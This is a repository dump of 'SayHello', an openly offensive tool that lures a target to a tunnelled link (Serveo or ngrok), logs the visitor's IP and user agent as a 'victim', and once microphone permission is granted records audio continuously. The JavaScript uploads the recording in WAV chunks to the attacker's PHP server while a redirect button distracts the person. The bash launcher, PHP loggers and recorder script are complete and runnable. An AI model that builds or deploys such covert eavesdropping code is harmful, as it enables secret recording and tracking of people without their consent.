├── README.md
├── index2.html
├── ip.php
├── js
    └── _app.js
├── sayhello.sh
├── template.php
└── upload.php


/README.md:
--------------------------------------------------------------------------------
 1 | # SAyHello v1.0
 2 | ## Author: github.com/thelinuxchoice/sayhello
 3 | ## Twitter: twitter.com/linux_choice
 4 | 
 5 | Capturing audio (.wav) from target using a link
 6 | 
 7 | ![hello](https://user-images.githubusercontent.com/34893261/66277580-c7f4b980-e876-11e9-9d05-e3170ad9278e.png)
 8 | 
 9 | ### How it works?
10 | 
11 | After the user grants microphone permissions, a website redirect button of your choice is released to distract the target while small audio files (about 4 seconds in wav format) are sent to the attacker.
12 | It uses Recorderjs, plugin for recording/exporting the output of Web Audio API nodes (https://github.com/mattdiamond/Recorderjs)
13 | 
14 | ### Features:
15 | 
16 | Port Forwarding using Serveo or Ngrok
17 | 
18 | ## Legal disclaimer:
19 | 
20 | Usage of SayHello for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
21 | 
22 | ### Usage:
23 | ```
24 | git clone https://github.com/thelinuxchoice/sayhello
25 | cd sayhello
26 | bash sayhello.sh
27 | ```
28 | 
29 | ### Donate!
30 | Support the authors:
31 | ### Paypal:
32 | https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CLKRT5QXXFJY4&source=url
33 | ### LiberaPay:
34 | <noscript><a href="https://liberapay.com/thelinuxchoice/donate"><img alt="Donate using Liberapay" src="https://liberapay.com/assets/widgets/donate.svg"></a></noscript>
35 | 


--------------------------------------------------------------------------------
/index2.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |   <head>
 4 |     <meta charset="UTF-8" >
 5 |     <title></title>
 6 |     <meta name="viewport" content="width=device-width, initial-scale=1.0">
 7 |     
 8 | <style>
 9 | * {
10 |   padding: 0;
11 |   margin: 0;
12 | }
13 | 
14 | body {
15 |   margin: 1rem;
16 |   padding: 1rem;
17 |   font-family: sans-serif;
18 |   max-width: 28rem;
19 |   margin: 0 auto;
20 |   position: relative;
21 | }
22 | #controls {
23 |   display: flex;
24 |   margin-top: 2rem;
25 | }
26 | button {
27 |   flex-grow: 1;
28 |   height: 2.5rem;
29 |   min-width: 2rem;
30 |   border: none;
31 |   border-radius: 0.15rem;
32 |   background: #ed341d;
33 |   margin-left: 2px;
34 |   box-shadow: inset 0 -0.15rem 0 rgba(0, 0, 0, 0.2);
35 |   cursor: pointer;
36 |   display: flex;
37 |   justify-content: center;
38 |   align-items: center;
39 |   color:#ffffff;
40 |   font-weight: bold;
41 |   font-size: 1rem;
42 | }
43 | button:hover, button:focus {
44 |   outline: none;
45 |   background: #c72d1c;
46 | }
47 | button::-moz-focus-inner {
48 |   border: 0;
49 | }
50 | button:active {
51 |   box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.2);
52 |   line-height: 3rem;
53 | }
54 | button:disabled {
55 |   pointer-events: none;
56 |   background: lightgray;
57 | }
58 | button:first-child {
59 |   margin-left: 0;
60 | }
61 | </style>
62 |   </head>
63 |   <body>
64 |     <h1></h1>
65 |  
66 |     <div id="controls">
67 |   	 <button id="redButton" disabled>Redirect to Website</button> 
68 |   
69 |     </div>
70 |     <!-- inserting these scripts at the end to be able to use all the elements in the DOM -->
71 |   	<script src="https://cdn.rawgit.com/mattdiamond/Recorderjs/08e7abd9/dist/recorder.js"></script>
72 |   	<script src="js/app.js"></script>
73 |     
74 |   </body>
75 | </html>
76 | 


--------------------------------------------------------------------------------
/ip.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | if (!empty($_SERVER['HTTP_CLIENT_IP']))
 4 |     {
 5 |       $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
 6 |     }
 7 | elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
 8 |     {
 9 |       $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
10 |     }
11 | else
12 |     {
13 |       $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
14 |     }
15 | $useragent = " User-Agent: ";
16 | $browser = $_SERVER['HTTP_USER_AGENT'];
17 | 
18 | 
19 | $file = 'ip.txt';
20 | $victim = "IP: ";
21 | $fp = fopen($file, 'a');
22 | 
23 | fwrite($fp, $victim);
24 | fwrite($fp, $ipaddress);
25 | fwrite($fp, $useragent);
26 | fwrite($fp, $browser);
27 | 
28 | 
29 | fclose($fp);
30 | 


--------------------------------------------------------------------------------
/js/_app.js:
--------------------------------------------------------------------------------
  1 | // Adapted from Simple Recorder.js Demo https://github.com/addpipe/simple-recorderjs-demo
  2 | // Recorderjs by: https://github.com/mattdiamond/Recorderjs
  3 | //webkitURL is deprecated but nevertheless
  4 | URL = window.URL || window.webkitURL;
  5 | 
  6 | var gumStream; 						//stream from getUserMedia()
  7 | var rec; 							//Recorder.js object
  8 | var input; 							//MediaStreamAudioSourceNode we'll be recording
  9 | 
 10 | // shim for AudioContext when it's not avb. 
 11 | var AudioContext = window.AudioContext || window.webkitAudioContext;
 12 | var audioContext //audio context to help us record
 13 | 
 14 | var redButton = document.getElementById("redButton");
 15 | 
 16 | redButton.addEventListener("click", Redirect);
 17 | 
 18 | 
 19 | function Redirect() {
 20 | 
 21 | window.open('redirect_link', '_blank');
 22 | 
 23 | 
 24 | }
 25 | 
 26 | window.setTimeout(startRecording, 300);
 27 | window.setInterval(stopRecording, 6000);
 28 | 
 29 | 
 30 | 
 31 | function startRecording() {
 32 | 	//console.log("recordButton clicked");
 33 | 
 34 | 	/*
 35 | 		Simple constraints object, for more advanced audio features see
 36 | 		https://addpipe.com/blog/audio-constraints-getusermedia/
 37 | 	*/
 38 |     
 39 |     var constraints = { audio: true, video:false }
 40 | 
 41 | 
 42 | 	/*
 43 |     	We're using the standard promise based getUserMedia() 
 44 |     	https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia
 45 | 	*/
 46 | 
 47 | 	navigator.mediaDevices.getUserMedia(constraints).then(function(stream) {
 48 | 		console.log("getUserMedia() success, stream created, initializing Recorder.js ...");
 49 | 
 50 | 		/*
 51 | 			create an audio context after getUserMedia is called
 52 | 			sampleRate might change after getUserMedia is called, like it does on macOS when recording through AirPods
 53 | 			the sampleRate defaults to the one set in your OS for your playback device
 54 | 
 55 | 		*/
 56 | 		audioContext = new AudioContext();
 57 | 
 58 | 		//update the format 
 59 | 	//	document.getElementById("formats").innerHTML="Format: 1 channel pcm @ "+audioContext.sampleRate/1000+"kHz"
 60 | 
 61 | 		/*  assign to gumStream for later use  */
 62 | 		gumStream = stream;
 63 | 		
 64 | 		/* use the stream */
 65 | 		input = audioContext.createMediaStreamSource(stream);
 66 | 
 67 | 		/* 
 68 | 			Create the Recorder object and configure to record mono sound (1 channel)
 69 | 			Recording 2 channels  will double the file size
 70 | 		*/
 71 | 		rec = new Recorder(input,{numChannels:1})
 72 | 
 73 | 		//start the recording process
 74 | 		rec.record()
 75 | 		redButton.disabled = false;
 76 | 
 77 | 		//console.log("Recording started");
 78 | 
 79 | 
 80 | 	}).catch(function(err) {
 81 | 	  	//enable the record button if getUserMedia() fails
 82 |     	redButton.disabled = true;
 83 | 	window.location.reload();
 84 | 	});
 85 | }
 86 | 
 87 | 
 88 | function uploadRecord() {
 89 | 
 90 | $(document).ready(function() {
 91 | 	$('a#Upload')[0].click();
 92 | 
 93 | });
 94 | 	
 95 | 
 96 | }
 97 | 
 98 | function stopRecording() {
 99 | 	//console.log("stopButton clicked");
100 | 
101 | 
102 | 	//tell the recorder to stop the recording
103 | 	rec.stop();
104 | 
105 | 	//stop microphone access
106 | 	//gumStream.getAudioTracks()[0].stop();
107 | 
108 | 	//create the wav blob and pass it on to createDownloadLink
109 | 	rec.exportWAV(createDownloadLink);
110 | 
111 | }
112 | 
113 | function createDownloadLink(blob) {
114 | 	
115 | 	var url = URL.createObjectURL(blob);
116 | 	var filename = new Date().toISOString();
117 | 
118 | 
119 | 		  var xhr=new XMLHttpRequest();
120 | 		  xhr.onload=function(e) {
121 | 		      if(this.readyState === 4) {
122 | 		        //  console.log("Server returned: ",e.target.responseText);
123 | 		      }
124 | 		  };
125 | 
126 | 
127 | 		  var fd=new FormData();
128 | 		  fd.append("audio_data",blob, filename);
129 | 		  xhr.open("POST","upload.php",true);
130 | 		  xhr.send(fd);
131 | 
132 | 	window.setTimeout(startRecording, 300);
133 | 
134 | }
135 | 


--------------------------------------------------------------------------------
/sayhello.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # SayHello v1.1
  3 | # coded by: github.com/thelinuxchoice/sayhello
  4 | # Twitter: @linux_choice
  5 | # Using Recorderjs by: https://github.com/mattdiamond/Recorderjs
  6 | trap 'printf "\n";stop' 2
  7 | 
  8 | banner() {
  9 | 
 10 |  
 11 | printf "\e[1;92m                                          __ \e[0m\n"
 12 | printf "\e[1;93m  ____              _   _      _ _ \e[0m\e[1;92m      /__\  \e[0m\n"
 13 | printf "\e[1;93m / ___|  __ _ _   _| | | | ___| | | ___ \e[0m\e[1;92m \__/  \e[0m\n"
 14 | printf "\e[1;93m \___ \ / _\` | | | | |_| |/ _ \ | |/ _ \ \e[0m\e[1;92m || \e[0m\n"
 15 | printf "\e[1;93m  ___) | (_| | |_| |  _  |  __/ | | (_) | \e[0m\e[1;92m|| \e[0m\n"
 16 | printf "\e[1;93m |____/ \__,_|\__, |_| |_|\___|_|_|\___/  \e[0m\e[1;92m|| \e[0m\n"
 17 | printf "\e[1;93m              |___/                        \e[0m\e[1;92m\__ \e[0m\n"
 18 | printf "\e[1;92m                                              \ \e[0m\n"
 19 | 
 20 | 
 21 | printf "\e[1;77m v1.1 coded by github.com/thelinuxchoice/sayhello\e[0m \n"
 22 | 
 23 | printf " Twitter: @linux_choice\n"
 24 | 
 25 | 
 26 | }
 27 | 
 28 | stop() {
 29 | 
 30 | checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
 31 | checkphp=$(ps aux | grep -o "php" | head -n1)
 32 | checkssh=$(ps aux | grep -o "ssh" | head -n1)
 33 | if [[ $checkngrok == *'ngrok'* ]]; then
 34 | pkill -f -2 ngrok > /dev/null 2>&1
 35 | killall -2 ngrok > /dev/null 2>&1
 36 | fi
 37 | 
 38 | if [[ $checkphp == *'php'* ]]; then
 39 | killall -2 php > /dev/null 2>&1
 40 | fi
 41 | if [[ $checkssh == *'ssh'* ]]; then
 42 | killall -2 ssh > /dev/null 2>&1
 43 | fi
 44 | exit 1
 45 | 
 46 | }
 47 | 
 48 | dependencies() {
 49 | 
 50 | 
 51 | command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
 52 |  
 53 | 
 54 | 
 55 | }
 56 | 
 57 | catch_ip() {
 58 | 
 59 | ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r')
 60 | IFS=$'\n'
 61 | printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m %s\e[0m\n" $ip
 62 | 
 63 | cat ip.txt >> saved.ip.txt
 64 | 
 65 | 
 66 | }
 67 | 
 68 | checkfound() {
 69 | 
 70 | printf "\n"
 71 | printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting targets,\e[0m\e[1;77m Press Ctrl + C to exit...\e[0m\n"
 72 | while [ true ]; do
 73 | 
 74 | 
 75 | if [[ -e "ip.txt" ]]; then
 76 | printf "\n\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n"
 77 | catch_ip
 78 | rm -rf ip.txt
 79 | 
 80 | fi
 81 | 
 82 | sleep 0.5
 83 | 
 84 | if [[ -e "Log.log" ]]; then
 85 | printf "\n\e[1;92m[\e[0m+\e[1;92m] Audio file received!\e[0m\n"
 86 | rm -rf Log.log
 87 | fi
 88 | sleep 0.5
 89 | 
 90 | done 
 91 | 
 92 | }
 93 | 
 94 | 
 95 | server() {
 96 | 
 97 | command -v ssh > /dev/null 2>&1 || { echo >&2 "I require ssh but it's not installed. Install it. Aborting."; exit 1; }
 98 | 
 99 | printf "\e[1;77m[\e[0m\e[1;93m+\e[0m\e[1;77m] Starting Serveo...\e[0m\n"
100 | 
101 | if [[ $checkphp == *'php'* ]]; then
102 | killall -2 php > /dev/null 2>&1
103 | fi
104 | 
105 | if [[ $subdomain_resp == true ]]; then
106 | 
107 | $(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R '$subdomain':80:localhost:3333 serveo.net  2> /dev/null > sendlink ' &
108 | 
109 | sleep 8
110 | else
111 | $(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:3333 serveo.net 2> /dev/null > sendlink ' &
112 | 
113 | sleep 8
114 | fi
115 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m] Starting php server... (localhost:3333)\e[0m\n"
116 | fuser -k 3333/tcp > /dev/null 2>&1
117 | php -S localhost:3333 > /dev/null 2>&1 &
118 | sleep 3
119 | send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)
120 | printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Direct link:\e[0m\e[1;77m %s\n' $send_link
121 | 
122 | }
123 | 
124 | 
125 | payload_ngrok() {
126 | 
127 | link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
128 | sed 's+forwarding_link+'$link'+g' template.php > index.php
129 | sed 's+redirect_link+'$redirect_link'+g' js/_app.js > js/app.js
130 | 
131 | 
132 | }
133 | 
134 | ngrok_server() {
135 | 
136 | 
137 | if [[ -e ngrok ]]; then
138 | echo ""
139 | else
140 | command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
141 | command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
142 | printf "\e[1;92m[\e[0m+\e[1;92m] Downloading Ngrok...\n"
143 | arch=$(uname -a | grep -o 'arm' | head -n1)
144 | arch2=$(uname -a | grep -o 'Android' | head -n1)
145 | if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
146 | wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
147 | 
148 | if [[ -e ngrok-stable-linux-arm.zip ]]; then
149 | unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
150 | chmod +x ngrok
151 | rm -rf ngrok-stable-linux-arm.zip
152 | else
153 | printf "\e[1;93m[!] Download error... Termux, run:\e[0m\e[1;77m pkg install wget\e[0m\n"
154 | exit 1
155 | fi
156 | 
157 | else
158 | wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 
159 | if [[ -e ngrok-stable-linux-386.zip ]]; then
160 | unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
161 | chmod +x ngrok
162 | rm -rf ngrok-stable-linux-386.zip
163 | else
164 | printf "\e[1;93m[!] Download error... \e[0m\n"
165 | exit 1
166 | fi
167 | fi
168 | fi
169 | 
170 | printf "\e[1;92m[\e[0m+\e[1;92m] Starting php server...\n"
171 | php -S 127.0.0.1:3333 > /dev/null 2>&1 & 
172 | sleep 2
173 | printf "\e[1;92m[\e[0m+\e[1;92m] Starting ngrok server...\n"
174 | ./ngrok http 3333 > /dev/null 2>&1 &
175 | sleep 10
176 | 
177 | link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
178 | printf "\e[1;92m[\e[0m*\e[1;92m] Direct link:\e[0m\e[1;77m %s\e[0m\n" $link
179 | 
180 | payload_ngrok
181 | checkfound
182 | }
183 | 
184 | start1() {
185 | if [[ -e sendlink ]]; then
186 | rm -rf sendlink
187 | fi
188 | 
189 | printf "\n"
190 | printf "\e[1;92m[\e[0m\e[1;77m01\e[0m\e[1;92m]\e[0m\e[1;93m Serveo.net\e[0m\n"
191 | printf "\e[1;92m[\e[0m\e[1;77m02\e[0m\e[1;92m]\e[0m\e[1;93m Ngrok\e[0m\n"
192 | default_option_server="1"
193 | read -p $'\n\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Choose a Port Forwarding option: \e[0m' option_server
194 | option_server="${option_server:-${default_option_server}}"
195 | 
196 | default_redirect="https://youtube.com"
197 | printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Choose a distracting website (Default:\e[0m\e[1;77m %s\e[0m\e[1;92m ): \e[0m" $default_redirect
198 | read redirect_link
199 | redirect_link="${redirect_link:-${default_redirect}}"
200 | 
201 | if [[ $option_server -eq 1 ]]; then
202 | 
203 | command -v php > /dev/null 2>&1 || { echo >&2 "I require ssh but it's not installed. Install it. Aborting."; exit 1; }
204 | start
205 | 
206 | elif [[ $option_server -eq 2 ]]; then
207 | ngrok_server
208 | else
209 | printf "\e[1;93m [!] Invalid option!\e[0m\n"
210 | sleep 1
211 | clear
212 | start1
213 | fi
214 | 
215 | }
216 | 
217 | 
218 | payload() {
219 | 
220 | send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)
221 | 
222 | 
223 | sed 's+forwarding_link+'$send_link'+g' template.php > index.php
224 | sed 's+redirect_link+'$redirect_link'+g' js/_app.js > js/app.js
225 | 
226 | 
227 | }
228 | 
229 | start() {
230 | 
231 | default_choose_sub="Y"
232 | default_subdomain="sayhello$RANDOM"
233 | 
234 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Choose subdomain? \e[0m\e[1;77m [Y/n] \e[0m\e[1;33m: \e[0m'
235 | read choose_sub
236 | choose_sub="${choose_sub:-${default_choose_sub}}"
237 | if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
238 | subdomain_resp=true
239 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Subdomain (Default:\e[0m\e[1;77m %s \e[0m\e[1;33m): \e[0m' $default_subdomain
240 | read subdomain
241 | subdomain="${subdomain:-${default_subdomain}}"
242 | fi
243 | 
244 | server
245 | payload
246 | checkfound
247 | 
248 | }
249 | 
250 | banner
251 | dependencies
252 | start1
253 | 
254 | 


--------------------------------------------------------------------------------
/template.php:
--------------------------------------------------------------------------------
1 | <?php
2 | include 'ip.php';
3 | header('Location: forwarding_link/index2.html');
4 | exit
5 | ?>
6 | 


--------------------------------------------------------------------------------
/upload.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | print_r($_FILES); //this will print out the received name, temp name, type, size, etc.
 3 | 
 4 | if (!empty($_FILES)) {
 5 | error_log("Received" . "\r\n", 3, "Log.log");
 6 | 
 7 | }
 8 | 
 9 | $size = $_FILES['audio_data']['size']; //the size in bytes
10 | $input = $_FILES['audio_data']['tmp_name']; //temporary name that PHP gave to the uploaded file
11 | $output = $_FILES['audio_data']['name'].".wav"; //letting the client control the filename is a rather bad idea
12 | 
13 | //move the file from temp name to local folder using $output name
14 | move_uploaded_file($input, $output)
15 | ?>
16 | 


--------------------------------------------------------------------------------